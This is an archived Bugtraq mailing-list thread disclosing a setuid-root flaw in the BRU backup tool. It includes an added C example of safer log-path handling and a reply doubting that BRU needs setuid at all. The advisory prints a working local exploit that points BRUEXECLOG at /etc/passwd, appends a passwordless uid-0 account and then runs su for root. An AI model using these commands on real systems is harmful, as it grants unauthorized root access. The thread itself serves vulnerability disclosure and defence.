5169783 2000-06-07 00:32 /74 lines/ Postmaster
Recipient: Bugtraq (import) <11185>
Subject: BRU Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="------------4A45ED3ABE8DAC5121B79B82"
Message-ID: <393D6B8F.B2099152@gte.net>
Date: Tue, 6 Jun 2000 14:22:24 -0700
Reply-To: root <comsec.admin@GTE.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
We have found a vulnerability in BRU during our 'Security Contest' for
our company.
The details are included.
--
Riley Hassell
Network Security
Speakeasy Networks
1-206-728-9770 ext151
1-206-917-5151 Direct Line
Attachment (inline): adv.txt
BRU backup software Vulnerability:
Description:
You can change the log file BRU uses by changing the
BRUEXECLOG environment variable. Since bru is setuid
root you can append to any file on the system.
Exploitation:
$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#
Temporary fix:
Why do normal users need to run bru? ;)
(5169783) ------------------------------------------
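The advisory above comes down to a setuid-root program opening a log file whose path is taken from BRUEXECLOG. The following C code is an added example, not BRU's source and not part of the original posts; it shows one way such a program can ignore the override when it runs with elevated ids and open the log with the invoking user's own rights. The function names and the default path are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Constructed default path for this example, not BRU's real one. */
static const char DEFAULT_LOG[] = "/tmp/bruexeclog.example";

/* Policy: honor the environment override only when the process holds no
 * extra privilege, i.e. real and effective ids match. */
const char *choose_log_path(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                            const char *override, const char *fallback)
{
    if (override == NULL || override[0] == '\0')
        return fallback;
    if (ruid != euid || rgid != egid)
        return fallback;            /* setuid/setgid: ignore environment */
    return override;
}

/* Open the log for append as the invoking user, so the kernel applies
 * that user's file permissions; O_NOFOLLOW refuses a symlinked path. */
int open_log_as_caller(const char *path)
{
    uid_t saved = geteuid();
    int fd;

    if (seteuid(getuid()) != 0)     /* drop to the real uid for the open */
        return -1;
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (seteuid(saved) != 0) {      /* restore; fail closed if we cannot */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    const char *path = choose_log_path(getuid(), geteuid(), getgid(), getegid(),
                                       getenv("BRUEXECLOG"), DEFAULT_LOG);
    int fd = open_log_as_caller(path);
    if (fd < 0) { perror("open log"); return 1; }
    dprintf(fd, "run by uid %ld\n", (long)getuid());
    close(fd);
    return 0;
}
```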
5176859 2000-06-08 20:42 /36 lines/ Postmaster
Recipient: Bugtraq (import) <11210>
Subject: Re: BRU Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <393F3D20.BB89F298@netmor.com>
Date: Thu, 8 Jun 2000 09:28:48 +0300
Reply-To: gavrie@NETMOR.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Gavrie Philipson <gavrie@NETMOR.COM>
Organization: Netmor Ltd.
X-To: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
root wrote:
> BRU backup software Vulnerability:
>
> Description:
> You can change the log file BRU uses by changing the
> BRUEXECLOG environment variable. Since bru is setuid
> root you can append to any file on the system.
Why, am I wondering, would a sane person install BRU with setuid
permissions?
That's like installing tar with setuid permissions and wondering about
overwritten files.
On my systems, BRU works fine without any setuid/setgid perms.
Gavrie.
--
Gavrie Philipson
Netmor Applied Modeling Research Ltd.
(5176859) ------------------------------------------